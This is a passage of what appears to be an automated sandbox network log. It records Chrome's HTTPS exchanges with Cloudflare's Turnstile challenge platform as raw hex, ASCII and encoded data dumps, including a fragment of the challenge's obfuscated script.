                                                                2025-01-13 19:54:52 UTC1369INData Raw: 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 69 72 28 36 31 33 29 5d 5b 69 72 28 39 36 32 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 69 72 28 31 31 33 35 29 5d 28 43 2c 78 5b 69 72 28 38 37 35 29 5d 29 3b 6f 5b 69 72 28 31 35 37 37 29 5d 28 69 72 28 34 30 34 29 2c 69 72 28 37 36 33 29 29 3f 74 68 69 73 2e 68 5b 6f 5b 69 72 28 34 33 38 29 5d 28 6f 5b 69 72 28 31 37 38 36 29 5d 28 74 68 69 73 2e 68 5b 6f 5b 69 72 28 31 37 38 36 29 5d 28 39 39 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 31 39 31 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 39 39 5d 5b 31 5d 5b 69 72 28 31 33 35 34 29 5d 28 74 68 69 73 2e 68 5b 6f 5b 69 72 28 31 35 33 32 29 5d 28 39 39 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 26 32 35 35 29 5e 31 32 38 2e 39
                                                                Data Ascii: ),B='nAsAaAb'.split('A'),B=B[ir(613)][ir(962)](B),C=0;o[ir(1135)](C,x[ir(875)]);o[ir(1577)](ir(404),ir(763))?this.h[o[ir(438)](o[ir(1786)](this.h[o[ir(1786)](99,this.g)][3],191+this.h[this.g^99][1][ir(1354)](this.h[o[ir(1532)](99,this.g)][0]++)&255)^128.9
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 32 29 5d 28 67 4a 28 31 35 36 38 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 67 46 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 67 46 2c 30 29 2c 67 47 3d 66 75 6e 63 74 69 6f 6e 28 6a 74 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 74 3d 67 4a 2c 64 3d 7b 27 6c 6f 6f 48 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 70 48 48 73 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 42 69 56 76 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 43 50 43 48 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 4b 6a 4f 73 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68
                                                                Data Ascii: 2)](gJ(1568),function(){setTimeout(gF,0)}):setTimeout(gF,0),gG=function(jt,d,e,f,g){return jt=gJ,d={'looHS':function(h,i){return i==h},'pHHsI':function(h,i){return h<i},'BiVvi':function(h,i){return h-i},'CPCHh':function(h,i){return h>i},'KjOsF':function(h
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 2c 6a 76 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 6a 76 3d 6a 74 2c 64 5b 6a 76 28 31 37 39 34 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 64 5b 6a 76 28 31 36 35 37 29 5d 28 4a 2c 69 5b 6a 76 28 38 37 35 29 5d 29 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 6a 76 28 31 32 32 36 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 6a 76 28 31 36 32 34 29 5d 5b 6a 76 28 31 31 34 35 29 5d 5b 6a 76 28 31 32 30 31 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 6a 76 28 31 36 32
                                                                Data Ascii: ,jv,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O){if(jv=jt,d[jv(1794)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;d[jv(1657)](J,i[jv(875)]);J+=1)if(K=i[jv(1226)](J),Object[jv(1624)][jv(1145)][jv(1201)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[jv(162


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.549731104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:52 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 3204
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: 60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:52 UTC3204OUTData Raw: 76 5f 39 30 31 37 66 30 63 31 39 62 66 36 34 33 35 37 3d 7a 45 61 35 6e 35 70 35 42 35 25 32 62 35 38 73 6d 55 73 6d 6c 35 73 5a 4c 54 78 69 5a 6d 2d 73 67 67 6d 52 64 6d 4c 56 35 73 4b 6d 31 35 4c 61 69 4c 74 4b 61 6d 44 75 4b 6d 24 62 73 71 7a 6d 66 35 73 6c 61 6d 4c 37 43 45 32 50 6d 37 54 6d 48 6d 73 45 6d 37 61 39 56 6d 64 6d 32 56 4c 67 6d 54 56 75 61 6d 42 47 34 61 32 6c 57 35 4c 30 6d 79 74 6f 63 61 6d 59 37 56 73 79 6d 7a 34 54 32 24 39 38 4f 61 32 2b 47 6d 31 69 6d 69 6e 39 38 59 53 33 30 52 53 6d 31 36 33 56 66 4c 32 7a 48 49 50 51 56 32 68 55 73 69 56 4b 56 76 50 57 30 45 6d 57 34 54 6d 70 43 4e 71 56 49 31 42 59 56 32 67 4c 37 6c 63 57 75 54 4a 59 67 30 45 52 31 49 4e 4b 43 72 6d 39 67 57 61 67 66 62 6d 6a 69 24 64 48 74 2d 6d 56 66 74 6d 67
                                                                Data Ascii: v_9017f0c19bf64357=zEa5n5p5B5%2b58smUsml5sZLTxiZm-sggmRdmLV5sKm15LaiLtKamDuKm$bsqzmf5slamL7CE2Pm7TmHmsEm7a9Vmdm2VLgmTVuamBG4a2lW5L0mytocamY7Vsymz4T2$98Oa2+Gm1imin98YS30RSm163VfL2zHIPQV2hUsiVKVvPW0EmW4TmpCNqVI1BYV2gL7lcWuTJYg0ER1INKCrm9gWagfbmji$dHt-mVftmg
                                                                2025-01-13 19:54:52 UTC751INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:52 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 152988
                                                                Connection: close
                                                                cf-chl-gen: txXEzTbkKXmEZOfo5F7xYFDlFsHDxgbWih84j+fVfg/SL3K5Anz2fmpypW967I/9rrEYJt4au6DLEh2PQOTRq/gIYQlcXfPbmWU4Zl30+297DCo45NNIm506tei0cLMcP+29uJNRFuHDc0pwSQ2N10FdKJh4UNwuuttyPlOLhje0Vm08AGb+ZkTo9ux6RsZUNcfgOxp+7aQVclrP/2Fy7q1MWcbvOdo//CmIQW4z8huHIOvWqiHxAmbYGlFBnTG0TFAngSmN4dv90uVmXC3BtLS9o7Xi3AU5AbpujYMl7l0eiuMleqpioYClHdjlL/xz6HrDZj9YUL6wYSDmi6YNpJFefvd9DiSNr6pJnyv9sVHjYCqO4TF2JeCIq2EKqPfw23N59GinUMpk5O0R5jzHkj7MfdcU4d11gXMkUjAb+9HgUZGjcJOdbcpnj3NuBlps3cK0Nuv8A0YL1IDuElXN9PXbBd/erISOq6DG0ciManc=$+Dt/JWMq8JPJj97mIvKsfA==
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0cb7bda78e1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:52 UTC618INData Raw: 6b 63 56 33 74 4a 54 46 73 6f 61 4b 79 6f 75 5a 78 35 7a 43 70 70 47 55 74 4c 61 53 30 38 62 58 71 5a 4f 72 7a 4b 79 34 6d 4d 4f 72 34 37 75 68 35 61 57 2b 75 75 7a 58 79 36 62 72 77 2b 50 79 77 66 58 31 35 4d 54 70 78 63 65 74 36 72 76 4a 39 74 7a 79 31 77 50 61 30 38 50 42 30 39 6e 7a 34 4d 6e 56 2f 63 38 4f 36 65 6e 46 41 38 76 54 7a 51 62 35 36 78 72 61 36 75 34 66 33 77 38 4d 33 76 67 54 45 4e 38 6b 49 2f 6e 6a 33 75 73 76 2f 54 49 49 49 51 48 38 37 43 49 4a 41 69 77 73 4f 54 63 55 4f 68 6f 56 50 79 7a 37 42 54 64 41 41 41 6c 44 4f 6b 5a 44 44 45 6b 4e 55 53 6b 79 4a 54 4d 68 4e 45 31 61 4f 53 59 31 53 31 77 62 50 6c 64 59 4e 54 51 2b 56 45 67 33 57 47 52 4c 4f 44 5a 47 53 6b 4e 63 4b 30 4d 2f 55 57 5a 79 4d 54 45 31 62 58 6c 34 54 46 74 62 67 56 5a
                                                                Data Ascii: kcV3tJTFsoaKyouZx5zCppGUtLaS08bXqZOrzKy4mMOr47uh5aW+uuzXy6brw+PywfX15MTpxcet6rvJ9tzy1wPa08PB09nz4MnV/c8O6enFA8vTzQb56xra6u4f3w8M3vgTEN8kI/nj3usv/TIIIQH87CIJAiwsOTcUOhoVPyz7BTdAAAlDOkZDDEkNUSkyJTMhNE1aOSY1S1wbPldYNTQ+VEg3WGRLODZGSkNcK0M/UWZyMTE1bXl4TFtbgVZ
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 32 4b 66 32 78 74 59 70 75 4f 68 6c 71 47 6f 49 75 4d 67 47 47 67 6f 5a 42 78 59 71 6d 6c 6e 32 79 6f 67 59 61 50 73 49 6d 6e 6c 4c 61 44 67 70 4b 4c 71 49 2b 49 72 4c 69 67 6a 58 75 53 67 6e 32 64 6a 72 33 48 66 34 61 30 74 49 53 34 77 5a 43 36 6f 72 47 66 7a 36 75 30 79 35 57 77 72 34 36 56 31 4c 69 63 75 36 36 2f 34 4d 4c 56 76 61 4b 36 74 65 4f 65 6f 36 66 4c 36 4c 6e 54 7a 39 44 6e 79 61 37 75 34 74 4c 33 73 75 6e 56 32 62 75 35 34 73 37 65 30 74 58 69 77 2b 58 2b 36 41 71 2f 35 66 77 4c 30 66 37 78 43 65 6f 52 34 68 6e 54 38 50 6f 61 32 75 72 71 47 52 2f 39 2b 69 4d 41 45 69 4d 45 46 52 73 55 4b 41 6a 6d 36 51 7a 78 41 51 38 7a 41 53 4d 6a 4d 79 77 31 4d 78 41 33 39 44 50 38 49 67 77 30 4a 68 34 79 48 53 67 33 50 51 6f 6d 48 67 55 74 43 7a 45 64 56
                                                                Data Ascii: 2Kf2xtYpuOhlqGoIuMgGGgoZBxYqmln2yogYaPsImnlLaDgpKLqI+IrLigjXuSgn2djr3Hf4a0tIS4wZC6orGfz6u0y5Wwr46V1Licu66/4MLVvaK6teOeo6fL6LnTz9Dnya7u4tL3sunV2bu54s7e0tXiw+X+6Aq/5fwL0f7xCeoR4hnT8Poa2urqGR/9+iMAEiMEFRsUKAjm6QzxAQ8zASMjMyw1MxA39DP8Igw0Jh4yHSg3PQomHgUtCzEdV
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 52 68 56 68 6f 6c 49 35 62 6e 48 53 59 59 33 31 77 59 48 75 6e 69 59 4e 34 59 4b 57 67 70 72 4f 66 66 57 75 68 70 70 43 35 75 71 39 36 6c 5a 2b 6f 6a 70 72 42 6b 5a 56 38 6d 49 4b 30 77 4d 4f 6f 72 5a 2f 43 6e 36 44 50 72 38 75 52 73 70 36 31 78 71 4b 52 7a 4d 69 32 30 4d 7a 4b 75 72 79 66 6f 62 6d 30 74 72 6a 48 71 65 72 49 70 4f 54 44 32 4f 48 54 77 39 2f 6d 79 71 2f 6e 39 37 6e 46 7a 39 37 34 7a 66 48 70 34 64 44 4d 41 74 33 65 77 41 50 48 78 63 72 62 33 4f 66 62 33 42 4c 63 43 4f 67 53 30 51 6e 6b 30 50 49 50 43 4f 6b 61 34 50 59 57 32 78 34 57 46 52 7a 7a 4a 78 73 6b 2b 52 77 6e 48 51 34 53 43 51 38 71 38 54 67 50 39 43 34 58 4e 52 59 2f 2f 66 7a 37 4f 41 4d 54 41 43 38 55 4d 69 5a 4c 46 77 78 44 4b 79 30 70 4f 6a 45 4c 4d 42 4d 30 4a 53 45 32 4e 78
                                                                Data Ascii: RhVholI5bnHSYY31wYHuniYN4YKWgprOffWuhppC5uq96lZ+ojprBkZV8mIK0wMOorZ/Cn6DPr8uRsp61xqKRzMi20MzKuryfobm0trjHqerIpOTD2OHTw9/myq/n97nFz974zfHp4dDMAt3ewAPHxcrb3Ofb3BLcCOgS0Qnk0PIPCOka4PYW2x4WFRzzJxsk+RwnHQ4SCQ8q8TgP9C4XNRY//fz7OAMTAC8UMiZLFwxDKy0pOjELMBM0JSE2Nx
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 59 4a 56 63 6d 33 4f 59 67 33 47 4c 66 34 32 71 70 47 71 48 69 35 42 2f 6c 49 71 79 6d 4b 53 45 70 49 6d 57 76 62 61 4b 75 71 71 73 65 38 47 64 6e 4b 4e 36 75 73 6d 70 6f 61 37 49 6e 4d 61 35 75 34 76 46 6b 61 47 52 72 4e 4f 34 71 4d 66 4f 70 39 76 61 6e 72 32 7a 35 4d 58 47 78 37 6a 5a 30 39 58 6e 75 37 33 6d 35 61 2f 46 73 64 7a 7a 79 38 57 78 74 2f 6e 4d 33 4e 54 62 30 72 6e 4f 30 62 55 46 76 64 58 57 35 63 4c 57 77 73 73 41 79 74 6f 4f 2f 67 76 46 45 63 38 50 45 73 6f 49 34 2b 7a 6e 44 2b 6b 41 36 39 77 41 33 78 6e 79 45 76 58 68 39 75 6b 66 41 51 54 38 35 78 38 52 42 66 44 78 39 54 55 55 37 68 6f 71 43 43 73 37 4b 78 49 4b 48 66 73 4e 48 77 55 43 42 67 59 4a 42 41 59 67 43 51 6b 36 51 42 31 51 45 42 4d 79 46 6a 55 71 55 79 52 63 53 6a 4e 4a 49 44 59
                                                                Data Ascii: YJVcm3OYg3GLf42qpGqHi5B/lIqymKSEpImWvbaKuqqse8GdnKN6usmpoa7InMa5u4vFkaGRrNO4qMfOp9vanr2z5MXGx7jZ09Xnu73m5a/Fsdzzy8Wxt/nM3NTb0rnO0bUFvdXW5cLWwssAytoO/gvFEc8PEsoI4+znD+kA69wA3xnyEvXh9ukfAQT85x8RBfDx9TUU7hoqCCs7KxIKHfsNHwUCBgYJBAYgCQk6QB1QEBMyFjUqUyRcSjNJIDY
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 6f 6c 34 5a 4a 69 6a 6c 36 56 71 65 35 35 7a 6f 6e 43 75 64 6d 2b 32 6f 33 57 52 75 58 32 51 73 4b 31 39 6c 4d 4f 54 68 49 47 34 75 4a 2b 33 78 4b 69 69 78 4c 44 4f 6b 72 75 55 70 72 62 54 31 36 32 6e 30 63 57 79 30 5a 37 49 73 61 36 32 6e 38 53 39 6f 64 4f 6d 74 36 4f 6d 6e 2b 37 68 38 4d 4c 7a 75 2b 50 47 30 39 66 4a 7a 66 4c 38 74 4e 54 31 76 50 58 39 38 77 48 41 76 72 2f 57 36 66 37 53 36 2b 30 50 7a 66 72 38 2b 51 4c 4f 42 41 4c 6a 46 64 6a 70 2b 75 72 59 33 41 72 32 37 77 44 78 41 66 72 38 38 66 63 47 43 2f 6b 67 39 75 6e 37 45 42 2f 36 4c 67 38 68 4b 77 62 30 45 54 44 73 44 79 6b 63 39 68 77 33 4f 7a 6f 55 51 6a 31 45 46 42 63 2b 46 52 55 71 47 67 34 76 45 52 41 63 56 55 63 4d 56 30 5a 59 4a 56 67 70 56 52 55 78 48 43 6b 36 51 78 70 58 4a 54 67 35
                                                                Data Ascii: ol4ZJijl6Vqe55zonCudm+2o3WRuX2QsK19lMOThIG4uJ+3xKiixLDOkruUprbT162n0cWy0Z7Isa62n8S9odOmt6Omn+7h8MLzu+PG09fJzfL8tNT1vPX98wHAvr/W6f7S6+0Pzfr8+QLOBALjFdjp+urY3Ar27wDxAfr88fcGC/kg9un7EB/6Lg8hKwb0ETDsDykc9hw3OzoUQj1EFBc+FRUqGg4vERAcVUcMV0ZYJVgpVRUxHCk6QxpXJTg5
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 68 71 72 47 52 76 71 49 6d 31 68 33 4f 35 65 61 6d 73 73 59 35 32 6e 4a 32 78 77 71 2b 6a 77 70 57 66 75 35 6d 65 6e 72 2b 62 73 4d 65 67 7a 39 54 4b 30 61 2b 75 6b 63 4f 69 6b 38 65 58 73 38 75 2b 74 38 48 6a 30 38 62 5a 31 71 66 52 70 4f 69 70 75 73 62 4b 72 62 7a 74 34 4f 72 55 31 65 48 6d 78 4d 4c 74 79 73 6e 73 36 63 6d 7a 79 74 2f 53 7a 67 58 57 78 37 76 54 31 2b 4c 56 35 73 33 4c 32 51 48 39 37 65 45 46 31 75 62 69 47 75 76 31 7a 2b 59 52 33 74 50 71 44 75 37 76 2f 68 72 6a 41 69 55 4a 36 67 33 6d 4b 67 4d 63 4b 7a 41 72 37 2f 4d 31 4e 50 6b 4b 43 66 55 34 45 53 77 63 2b 69 37 38 46 51 4a 45 4d 52 38 59 42 67 4d 46 53 45 74 4e 52 7a 39 42 4a 6c 41 79 52 31 51 53 4b 78 74 64 58 53 64 63 58 55 4a 42 4c 69 52 6c 52 54 56 58 4b 54 68 67 52 79 56 49 4b
                                                                Data Ascii: hqrGRvqIm1h3O5eamssY52nJ2xwq+jwpWfu5menr+bsMegz9TK0a+ukcOik8eXs8u+t8Hj08bZ1qfRpOipusbKrbzt4OrU1eHmxMLtysns6cmzyt/SzgXWx7vT1+LV5s3L2QH97eEF1ubiGuv1z+YR3tPqDu7v/hrjAiUJ6g3mKgMcKzAr7/M1NPkKCfU4ESwc+i78FQJEMR8YBgMFSEtNRz9BJlAyR1QSKxtdXSdcXUJBLiRlRTVXKThgRyVIK
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 71 71 72 61 61 63 72 4b 34 6a 4b 74 36 6e 62 54 42 6b 34 2b 41 65 4a 70 2b 74 4d 53 54 71 72 7a 4e 6d 4a 32 4b 6a 61 54 4b 76 73 6d 2f 72 4d 53 37 75 70 71 57 72 36 6e 5a 72 4c 4b 38 7a 75 50 53 6f 71 6a 55 33 4b 4b 72 77 63 2f 43 75 4d 54 69 30 4f 57 74 31 36 6e 46 7a 38 62 4b 73 73 33 6f 74 66 48 33 33 50 66 36 2b 63 34 4a 77 64 37 33 31 41 44 68 2b 4f 33 48 35 38 67 4b 7a 77 44 6e 42 2b 6b 4f 30 2f 48 6b 39 2f 6b 58 2b 76 54 36 44 2b 2f 33 45 50 7a 6c 42 50 51 6d 49 67 6b 51 4c 68 4c 36 2f 50 48 78 41 77 6f 69 45 77 67 34 4a 42 73 4e 48 7a 67 33 4f 68 41 78 42 50 63 51 50 52 67 6c 51 42 55 32 4a 52 73 61 54 79 59 2f 4a 45 77 6b 4b 6c 52 57 4d 69 34 7a 54 68 78 63 4d 47 41 66 54 69 4a 57 4a 46 77 2b 5a 6a 5a 4c 56 6d 49 39 53 43 34 72 4f 30 5a 78 53 30
                                                                Data Ascii: qqraacrK4jKt6nbTBk4+AeJp+tMSTqrzNmJ2KjaTKvsm/rMS7upqWr6nZrLK8zuPSoqjU3KKrwc/CuMTi0OWt16nFz8bKss3otfH33Pf6+c4Jwd731ADh+O3H58gKzwDnB+kO0/Hk9/kX+vT6D+/3EPzlBPQmIgkQLhL6/PHxAwoiEwg4JBsNHzg3OhAxBPcQPRglQBU2JRsaTyY/JEwkKlRWMi4zThxcMGAfTiJWJFw+ZjZLVmI9SC4rO0ZxS0
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 64 70 75 4b 6d 36 79 4d 77 6f 47 62 66 4a 69 52 67 72 79 71 71 4c 79 6e 77 62 37 49 72 6f 6d 74 6a 73 4b 69 74 4a 62 57 72 73 53 58 6b 4e 50 63 6d 4f 4c 41 73 4c 37 67 31 63 6e 63 75 71 65 73 33 37 37 75 70 75 50 46 76 63 50 6e 78 75 66 51 36 64 6d 37 30 75 2b 31 7a 62 69 39 2f 74 34 45 76 76 4c 69 35 73 62 4b 2f 4f 58 33 2b 67 66 67 7a 66 72 7a 7a 52 45 54 30 52 4c 54 37 2b 6f 51 32 52 6f 68 47 74 72 33 49 69 51 5a 38 76 6b 71 34 68 63 5a 49 65 6f 63 2b 69 73 64 42 66 49 4f 4a 54 63 71 49 78 50 79 45 67 55 4b 4c 79 45 76 4d 67 73 35 2f 42 41 6d 4a 79 55 46 4f 43 45 44 52 43 38 4e 4b 45 73 6b 52 30 4d 32 52 43 30 50 4f 56 4d 58 56 46 77 62 50 45 39 66 4b 32 51 35 52 31 49 6f 57 56 5a 61 50 6b 4e 50 62 6a 35 48 57 6b 4d 2f 4a 79 39 58 63 6c 4e 55 55 48 52
                                                                Data Ascii: dpuKm6yMwoGbfJiRgryqqLynwb7IromtjsKitJbWrsSXkNPcmOLAsL7g1cncuqes377upuPFvcPnxufQ6dm70u+1zbi9/t4EvvLi5sbK/OX3+gfgzfrzzRET0RLT7+oQ2RohGtr3IiQZ8vkq4hcZIeoc+isdBfIOJTcqIxPyEgUKLyEvMgs5/BAmJyUFOCEDRC8NKEskR0M2RC0POVMXVFwbPE9fK2Q5R1IoWVZaPkNPbj5HWkM/Jy9XclNUUHR
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 35 32 74 68 63 4c 46 69 4a 76 41 74 62 6a 43 6d 72 33 4c 6b 5a 47 68 31 64 43 4a 6b 70 53 5a 6b 62 62 65 6e 4c 65 72 76 37 6a 50 33 63 62 53 6d 64 33 43 31 73 72 4a 79 74 37 71 35 2b 61 39 36 37 4f 30 38 75 7a 77 74 4d 53 30 2b 4d 7a 62 39 2b 33 75 36 39 2f 6a 38 4d 4c 62 35 50 4c 6b 39 74 38 4b 79 4f 7a 5a 34 51 63 51 37 67 54 75 44 4f 67 46 46 4e 66 73 2b 67 6a 33 46 52 6e 78 33 39 34 52 39 51 49 6a 46 75 55 63 41 51 59 4a 2f 54 44 75 2f 44 44 72 4a 68 55 52 4a 6a 45 45 45 53 59 79 47 6a 31 43 2b 69 2f 39 51 79 55 67 4d 54 59 68 53 43 73 71 48 30 6c 4e 4d 43 67 38 46 45 49 33 53 7a 63 71 57 6c 51 7a 4d 79 67 34 4e 54 4e 57 4c 46 55 6a 4c 6d 52 6d 4f 44 4a 71 4f 46 30 36 58 46 41 37 63 69 38 7a 63 6c 35 76 4c 30 39 52 4e 7a 6c 30 5a 6e 70 30 63 46 36 43
                                                                Data Ascii: 52thcLFiJvAtbjCmr3LkZGh1dCJkpSZkbbenLerv7jP3cbSmd3C1srJyt7q5+a967O08uzwtMS0+Mzb9+3u69/j8MLb5PLk9t8KyOzZ4QcQ7gTuDOgFFNfs+gj3FRnx394R9QIjFuUcAQYJ/TDu/DDrJhURJjEEESYyGj1C+i/9QyUgMTYhSCsqH0lNMCg8FEI3SzcqWlQzMyg4NTNWLFUjLmRmODJqOF06XFA7ci8zcl5vL09RNzl0Znp0cF6C


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.549734104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:52 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:53 UTC375INHTTP/1.1 404 Not Found
                                                                Date: Mon, 13 Jan 2025 19:54:53 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                cf-chl-out: IFmTYuJe7ph5c+MSSsAQDA==$6NDurffhG5BQk+RmU8OviQ==
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0d17d9c238a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:53 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.549735104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:53 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/9017f0c19bf64357/1736798092090/f65b749e6380f3d0be864737123b3cacba5c88d365ed8513907c381f725621c4/7je5Kn2j8A5PYz6 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:53 UTC143INHTTP/1.1 401 Unauthorized
                                                                Date: Mon, 13 Jan 2025 19:54:53 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 1
                                                                Connection: close
                                                                2025-01-13 19:54:53 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 39 6c 74 30 6e 6d 4f 41 38 39 43 2d 68 6b 63 33 45 6a 73 38 72 4c 70 63 69 4e 4e 6c 37 59 55 54 6b 48 77 34 48 33 4a 57 49 63 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 